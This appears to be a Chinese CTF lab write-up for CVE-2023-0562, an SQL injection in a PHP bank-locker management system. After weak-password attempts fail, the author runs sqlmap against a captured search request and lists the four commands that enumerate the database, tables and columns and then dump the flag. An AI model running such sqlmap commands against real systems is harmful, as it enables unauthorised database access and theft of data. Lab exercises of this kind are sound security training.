春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
亿.62 小时前
【Java安全】RMI基础
java·安全·ctf·rmi
weixin_472339464 小时前
网络安全之XSS漏洞:原理、危害与防御实践
安全·web安全·xss
敖行客 Allthinker7 小时前
云原生安全观察:零信任架构与动态防御的下一代免疫体系
安全·ai·云原生·架构·kubernetes·ebpf
卿着飞翔9 小时前
系统架构设计师论文分享-论系统安全设计
安全·系统架构·系统安全
Bruce_Liuxiaowei10 小时前
Netstat高级分析工具:Windows与Linux双系统兼容的精准筛查利器
linux·运维·网络·windows·安全
Par@ish11 小时前
【网络安全】恶意 Python 包“psslib”仿冒 passlib,可导致 Windows 系统关闭
windows·python·web安全
开开心心就好12 小时前
高效报价软件,简化商铺定价流程
服务器·数据库·安全·面试·职场和发展·电脑·symfony
科技云报道20 小时前
2025全球数字经济大会—云智算安全论坛暨第三届“SecGo论坛”成功召开!共筑安全新生态
安全
群联云防护小杜1 天前
构建分布式高防架构实现业务零中断
前端·网络·分布式·tcp/ip·安全·游戏·架构
独行soc1 天前
2025年渗透测试面试题总结-2025年HW(护网面试) 33(题目+回答)
linux·科技·安全·网络安全·面试·职场和发展·护网